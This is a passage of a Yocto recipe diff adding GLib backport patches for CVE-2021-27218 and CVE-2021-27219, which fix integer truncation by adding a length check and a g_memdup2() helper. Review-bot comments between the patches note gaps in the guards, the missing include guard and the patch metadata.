+ group->entries = g_renew (GOptionEntry, group->entries, group->n_entries + n_entries);
+
+ /* group->entries could be NULL in the trivial case where we add no
+--
+2.20.1
+
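Review bot: `g_return_if_fail (n_entries <= G_MAXSIZE - group->n_entries);` is a precondition macro, and GLib compiles those out when it is built with `G_DISABLE_CHECKS`, so in such a build the overflow check is gone; the `g_return_val_if_fail (len <= G_MAXUINT, NULL);` added by CVE-2021-27218.patch has the same property. If any configuration of this recipe defines that macro, the CVE would be recorded as patched while the guard is absent. I would note the dependency in the patch header, e.g. `Comment: the guard is a g_return_if_fail precondition and has no effect with G_DISABLE_CHECKS`. g_option_group_add_entries starts and ends outside the hunk.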
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
+Backport of:
+
+From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
+From: Krzesimir Nowak <qdlacz@gmail.com>
+Date: Wed, 10 Feb 2021 23:51:07 +0100
+Subject: [PATCH] gbytearray: Do not accept too large byte arrays
+
+GByteArray uses guint for storing the length of the byte array, but it
+also has a constructor (g_byte_array_new_take) that takes length as a
+gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
+for guint). It is possible to call the function with a value greater
+than G_MAXUINT, which will result in silent length truncation. This
+may happen as a result of unreffing GBytes into GByteArray, so rather
+be loud about it.
+
+(Test case tweaked by Philip Withnall.)
+
+(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
+`g_memdup2()`.)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27218
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/garray.c | 6 ++++++
+ glib/gbytes.c | 4 ++++
+ glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
+ 3 files changed, 44 insertions(+), 1 deletion(-)
+
+--- a/glib/garray.c
++++ b/glib/garray.c
+@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
+ * Create byte array containing the data. The data will be owned by the array
+ * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
+ *
++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
++ * stores the length of its data in #guint, which may be shorter than
++ * #gsize.
++ *
+ * Since: 2.32
+ *
+ * Returns: (transfer full): a new #GByteArray
+@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
+ GByteArray *array;
+ GRealArray *real;
+
++ g_return_val_if_fail (len <= G_MAXUINT, NULL);
++
+ array = g_byte_array_new ();
+ real = (GRealArray *)array;
+ g_assert (real->data == NULL);
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
+ * other cases the data is copied.
+ *
++ * Do not use it if @bytes contains more than %G_MAXUINT
++ * bytes. #GByteArray stores the length of its data in #guint, which
++ * may be shorter than #gsize, that @bytes is using.
++ *
+ * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
+ *
+ * Since: 2.32
+--- a/glib/tests/bytes.c
++++ b/glib/tests/bytes.c
+@@ -10,12 +10,12 @@
+ */
+
+ #undef G_DISABLE_ASSERT
+-#undef G_LOG_DOMAIN
+
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+ #include "glib.h"
++#include "glib/gstrfuncsprivate.h"
+
+ /* Keep in sync with glib/gbytes.c */
+ struct _GBytes
+@@ -334,6 +334,38 @@ test_to_array_transferred (void)
+ }
+
+ static void
++test_to_array_transferred_oversize (void)
++{
++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
++ "G_MAXUINT in length; test that longer ones are rejected");
++
++ if (sizeof (guint) >= sizeof (gsize))
++ {
++ g_test_skip ("Skipping test as guint is not smaller than gsize");
++ }
++ else if (g_test_undefined ())
++ {
++ GByteArray *array = NULL;
++ GBytes *bytes = NULL;
++ gpointer data = g_memdup2 (NYAN, N_NYAN);
++ gsize len = ((gsize) G_MAXUINT) + 1;
++
++ bytes = g_bytes_new_take (data, len);
++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
++ g_test_assert_expected_messages ();
++ g_assert_null (array);
++
++ g_free (data);
++ }
++ else
++ {
++ g_test_skip ("Skipping test as testing undefined behaviour is disabled");
++ }
++}
++
++static void
+ test_to_array_two_refs (void)
+ {
+ gconstpointer memory;
+@@ -410,6 +442,7 @@ main (int argc, char *argv[])
+ g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
+ g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
+ g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
+ g_test_add_func ("/bytes/null", test_null);
+
+ return g_test_run ();
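Review bot: The text added to the g_byte_array_new_take doc comment says not to pass a @len above %G_MAXUINT, but it does not say what happens to @data when the new `g_return_val_if_fail (len <= G_MAXUINT, NULL);` fires. The new test calls `g_free (data)` after the rejected conversion, which suggests the buffer is neither adopted nor freed on that path; a caller of g_bytes_unref_to_array that only sees the NULL return would then lose it. I would add one sentence to both doc comments, e.g. `If the length check fails, %NULL is returned and the data is not freed.`, once that is confirmed against the function bodies, which lie outside these hunks.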
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
+Backport of:
+
+From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:30:52 +0000
+Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This will replace the existing `g_memdup()` function for use within
+GLib. It has an unavoidable security flaw of taking its `byte_size`
+argument as a `guint` rather than as a `gsize`. Most callers will
+expect it to be a `gsize`, and may pass in large values which could
+silently be truncated, resulting in an undersize allocation compared
+to what the caller expects.
+
+This could lead to a classic buffer overflow vulnerability for many
+callers of `g_memdup()`.
+
+`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
+
+Spotted by Kevin Backhouse of GHSL.
+
+In GLib 2.68, `g_memdup2()` will be a new public API. In this version
+for backport to older stable releases, it’s a new `static inline` API
+in a private header, so that use of `g_memdup()` within GLib can be
+fixed without adding a new API in a stable release series.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ docs/reference/glib/meson.build | 1 +
+ glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++
+ glib/meson.build | 1 +
+ glib/tests/strfuncs.c | 23 ++++++++++++++
+ 4 files changed, 80 insertions(+)
+ create mode 100644 glib/gstrfuncsprivate.h
+
+--- a/docs/reference/glib/meson.build
++++ b/docs/reference/glib/meson.build
+@@ -22,6 +22,7 @@ if get_option('gtk_doc')
+ 'gprintfint.h',
+ 'gmirroringtable.h',
+ 'gscripttable.h',
++ 'gstrfuncsprivate.h',
+ 'glib-mirroring-tab',
+ 'gnulib',
+ 'pcre',
+--- /dev/null
++++ b/glib/gstrfuncsprivate.h
+@@ -0,0 +1,55 @@
++/* GLIB - Library of useful routines for C programming
++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
++ *
++ * This library is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU Lesser General Public
++ * License as published by the Free Software Foundation; either
++ * version 2.1 of the License, or (at your option) any later version.
++ *
++ * This library is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * Lesser General Public License for more details.
++ *
++ * You should have received a copy of the GNU Lesser General Public
++ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <glib.h>
++#include <string.h>
++
++/*
++ * g_memdup2:
++ * @mem: (nullable): the memory to copy.
++ * @byte_size: the number of bytes to copy.
++ *
++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
++ * from @mem. If @mem is %NULL it returns %NULL.
++ *
++ * This replaces g_memdup(), which was prone to integer overflows when
++ * converting the argument from a #gsize to a #guint.
++ *
++ * This static inline version is a backport of the new public API from
++ * GLib 2.68, kept internal to GLib for backport to older stable releases.
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
++ *
++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
++ * or %NULL if @mem is %NULL.
++ * Since: 2.68
++ */
++static inline gpointer
++g_memdup2 (gconstpointer mem,
++ gsize byte_size)
++{
++ gpointer new_mem;
++
++ if (mem && byte_size != 0)
++ {
++ new_mem = g_malloc (byte_size);
++ memcpy (new_mem, mem, byte_size);
++ }
++ else
++ new_mem = NULL;
++
++ return new_mem;
++}
+--- a/glib/meson.build
++++ b/glib/meson.build
+@@ -268,6 +268,7 @@ glib_sources = files(
+ 'gslist.c',
+ 'gstdio.c',
+ 'gstrfuncs.c',
++ 'gstrfuncsprivate.h',
+ 'gstring.c',
+ 'gstringchunk.c',
+ 'gtestutils.c',
+--- a/glib/tests/strfuncs.c
++++ b/glib/tests/strfuncs.c
+@@ -32,6 +32,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ #if defined (_MSC_VER) && (_MSC_VER <= 1800)
+ #define isnan(x) _isnan(x)
+
+@@ -219,6 +221,26 @@ test_memdup (void)
+ g_free (str_dup);
+ }
+
++/* Testing g_memdup2() function with various positive and negative cases */
++static void
++test_memdup2 (void)
++{
++ gchar *str_dup = NULL;
++ const gchar *str = "The quick brown fox jumps over the lazy dog";
++
++ /* Testing negative cases */
++ g_assert_null (g_memdup2 (NULL, 1024));
++ g_assert_null (g_memdup2 (str, 0));
++ g_assert_null (g_memdup2 (NULL, 0));
++
++ /* Testing normal usage cases */
++ str_dup = g_memdup2 (str, strlen (str) + 1);
++ g_assert_nonnull (str_dup);
++ g_assert_cmpstr (str, ==, str_dup);
++
++ g_free (str_dup);
++}
++
+ /* Testing g_strpcpy() function with various positive and negative cases */
+ static void
+ test_stpcpy (void)
+@@ -2523,6 +2545,7 @@ main (int argc,
+ g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
+ g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
+ g_test_add_func ("/strfuncs/memdup", test_memdup);
++ g_test_add_func ("/strfuncs/memdup2", test_memdup2);
+ g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
+ g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
+ g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
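Review bot: The new `glib/gstrfuncsprivate.h` defines `static inline g_memdup2()` but has no include guard, so a translation unit that reaches the header twice (once directly and once through another private header, for instance) would fail with a redefinition error. The later patches in this series add `#include "gstrfuncsprivate.h"` to many more sources, which makes that more likely over time. Wrapping the header body in an `#ifndef`/`#define`/`#endif` pair, or starting it with `#pragma once`, removes the risk without changing the function.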
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
+From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:37:56 +0000
+Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdbusconnection.c | 5 +++--
+ gio/gdbusinterfaceskeleton.c | 3 ++-
+ gio/gfile.c | 7 ++++---
+ gio/gsettingsschema.c | 5 +++--
+ gio/gwin32registrykey.c | 8 +++++---
+ gio/tests/async-close-output-stream.c | 6 ++++--
+ gio/tests/gdbus-export.c | 5 +++--
+ gio/win32/gwinhttpfile.c | 9 +++++----
+ 8 files changed, 29 insertions(+), 19 deletions(-)
+
+--- a/gio/gdbusconnection.c
++++ b/gio/gdbusconnection.c
+@@ -110,6 +110,7 @@
+ #include "gasyncinitable.h"
+ #include "giostream.h"
+ #include "gasyncresult.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gmarshal-internal.h"
+
+@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
+ /* Don't waste memory by copying padding - remember to update this
+ * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
+ */
+- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+
+ static void
+--- a/gio/gdbusinterfaceskeleton.c
++++ b/gio/gdbusinterfaceskeleton.c
+@@ -28,6 +28,7 @@
+ #include "gdbusmethodinvocation.h"
+ #include "gdbusconnection.h"
+ #include "gmarshal-internal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gioerror.h"
+
+@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
+ * properly before building the hooked_vtable, so we create it
+ * once at the last minute.
+ */
+- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
+ interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
+ }
+
+--- a/gio/gfile.c
++++ b/gio/gfile.c
+@@ -60,6 +60,7 @@
+ #include "gasyncresult.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+
+ /**
+@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
+ g_main_context_invoke_full (g_task_get_context (task),
+ g_task_get_priority (task),
+ measure_disk_usage_invoke_progress,
+- g_memdup (&progress, sizeof progress),
++ g_memdup2 (&progress, sizeof progress),
+ g_free);
+ }
+
+@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
+ data->progress_callback ? measure_disk_usage_progress : NULL, task,
+ &result.disk_usage, &result.num_dirs, &result.num_files,
+ &error))
+- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
+ else
+ g_task_return_error (task, error);
+ }
+@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
+
+ task = g_task_new (file, cancellable, callback, user_data);
+ g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
+- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
+ g_task_set_priority (task, io_priority);
+
+ g_task_run_in_thread (task, measure_disk_usage_thread);
+--- a/gio/gsettingsschema.c
++++ b/gio/gsettingsschema.c
+@@ -20,6 +20,7 @@
+
+ #include "gsettingsschema-internal.h"
+ #include "gsettings.h"
++#include "gstrfuncsprivate.h"
+
+ #include "gvdb/gvdb-reader.h"
+ #include "strinfo.c"
+@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
+
+ if (g_str_has_suffix (key, "/"))
+ {
+- gint length = strlen (key);
++ gsize length = strlen (key);
+
+- strv[j] = g_memdup (key, length);
++ strv[j] = g_memdup2 (key, length);
+ strv[j][length - 1] = '\0';
+ j++;
+ }
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -28,6 +28,8 @@
+ #include <ntstatus.h>
+ #include <winternl.h>
+
++#include "gstrfuncsprivate.h"
++
+ #ifndef _WDMDDK_
+ typedef enum _KEY_INFORMATION_CLASS {
+ KeyBasicInformation,
+@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_name_size = iter->value_name_size;
+
+ if (iter->value_data != NULL)
+- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
+
+ new_iter->value_data_size = iter->value_data_size;
+
+@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
+ new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
+
+ if (iter->value_data_expanded_u8 != NULL)
+- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
+- iter->value_data_expanded_charsize);
++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
++ iter->value_data_expanded_charsize);
+
+ new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
+
+--- a/gio/tests/async-close-output-stream.c
++++ b/gio/tests/async-close-output-stream.c
+@@ -24,6 +24,8 @@
+ #include <stdlib.h>
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ #define DATA_TO_WRITE "Hello world\n"
+
+ typedef struct
+@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
+
+ data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
+
+- g_assert_cmpint (data->expected_size, >, 0);
++ g_assert_cmpuint (data->expected_size, >, 0);
+
+- data->expected_output = g_memdup (written, (guint)data->expected_size);
++ data->expected_output = g_memdup2 (written, data->expected_size);
+
+ /* then recreate the streams and prepare them for the asynchronous close */
+ destroy_streams (data);
+--- a/gio/tests/gdbus-export.c
++++ b/gio/tests/gdbus-export.c
+@@ -23,6 +23,7 @@
+ #include <string.h>
+
+ #include "gdbus-tests.h"
++#include "gstrfuncsprivate.h"
+
+ /* all tests rely on a shared mainloop */
+ static GMainLoop *loop = NULL;
+@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
+ g_assert_not_reached ();
+ }
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
+ {
+ const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
+
+- return g_memdup (interfaces, 2 * sizeof (void *));
++ return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+
+ static const GDBusInterfaceVTable *
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -29,6 +29,7 @@
+ #include "gio/gfile.h"
+ #include "gio/gfileattribute.h"
+ #include "gio/gfileinfo.h"
++#include "gstrfuncsprivate.h"
+ #include "gwinhttpfile.h"
+ #include "gwinhttpfileinputstream.h"
+ #include "gwinhttpfileoutputstream.h"
+@@ -393,10 +394,10 @@
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
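Review bot: The `Upstream-Status: Backport [...]` trailer points at an Ubuntu packaging tarball on a third-party mirror rather than at the upstream GLib change, so the backport is hard to check against upstream and the reference depends on that mirror keeping the file. The upstream commit is already named on the `From` line (`be8834340a2d928ece82025463ae23dee2c333d0`), and the trailer could cite that commit in the GLib repository instead. The same trailer appears in CVE-2021-27219-01, -03, -04, -05 and -06. Separately, the `gio/win32/gwinhttpfile.c` hunk here still does the `(dw...Length+1)*2` arithmetic in `DWORD`; that is only corrected by CVE-2021-27219-05, so the two patches have to be applied together.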
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
+From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:39:25 +0000
+Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
+ obvious places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gobject/gsignal.c | 3 ++-
+ gobject/gtype.c | 9 +++++----
+ gobject/gtypemodule.c | 3 ++-
+ gobject/tests/param.c | 4 +++-
+ 4 files changed, 12 insertions(+), 7 deletions(-)
+
+--- a/gobject/gsignal.c
++++ b/gobject/gsignal.c
+@@ -28,6 +28,7 @@
+ #include <signal.h>
+
+ #include "gsignal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtype-private.h"
+ #include "gbsearcharray.h"
+ #include "gvaluecollector.h"
+@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal
+ node->single_va_closure_is_valid = FALSE;
+ node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
+ node->n_params = n_params;
+- node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
+ node->return_type = return_type;
+ node->class_closure_bsa = NULL;
+ if (accumulator)
+--- a/gobject/gtype.c
++++ b/gobject/gtype.c
+@@ -33,6 +33,7 @@
+
+ #include "glib-private.h"
+ #include "gconstructor.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ #include <windows.h>
+@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
+ iholder->next = iface_node_get_holders_L (iface);
+ iface_node_set_holders_W (iface, iholder);
+ iholder->instance_type = NODE_TYPE (node);
+- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
+ iholder->plugin = plugin;
+
+ /* create an iface entry for this type */
+@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
+ INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
+
+ check_interface_info_I (iface, instance_type, &tmp_info);
+- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
+ }
+
+ return iholder; /* we don't modify write lock upon returning NULL */
+@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
+ IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
+
+ if (pentry)
+- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
+ }
+ if (!vtable)
+- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
+ entry->vtable = vtable;
+ vtable->g_type = NODE_TYPE (iface);
+ vtable->g_instance_type = NODE_TYPE (node);
+--- a/gobject/gtypemodule.c
++++ b/gobject/gtypemodule.c
+@@ -19,6 +19,7 @@
+
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
+ #include "gtypeplugin.h"
+ #include "gtypemodule.h"
+
+@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
+ module_type_info->loaded = TRUE;
+ module_type_info->info = *type_info;
+ if (type_info->value_table)
+- module_type_info->info.value_table = g_memdup (type_info->value_table,
++ module_type_info->info.value_table = g_memdup2 (type_info->value_table,
+ sizeof (GTypeValueTable));
+
+ return module_type_info->type;
+--- a/gobject/tests/param.c
++++ b/gobject/tests/param.c
+@@ -2,6 +2,8 @@
+ #include <glib-object.h>
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
++
+ static void
+ test_param_value (void)
+ {
+@@ -874,7 +876,7 @@ main (int argc, char *argv[])
+ test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
+ data.change_this_flag, data.change_this_type,
+ data.use_this_flag, data.use_this_type);
+- test_data = g_memdup (&data, sizeof (TestParamImplementData));
++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
+ g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
+ g_free (test_path);
+ }
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
+Backport of:
+
+From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:41:21 +0000
+Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()` or an existing `gsize`
+variable), so that they use `g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it
+
+In particular, this fixes an overflow within `g_bytes_new()`, identified
+as GHSL-2021-045 by GHSL team member Kevin Backhouse.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Fixes: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
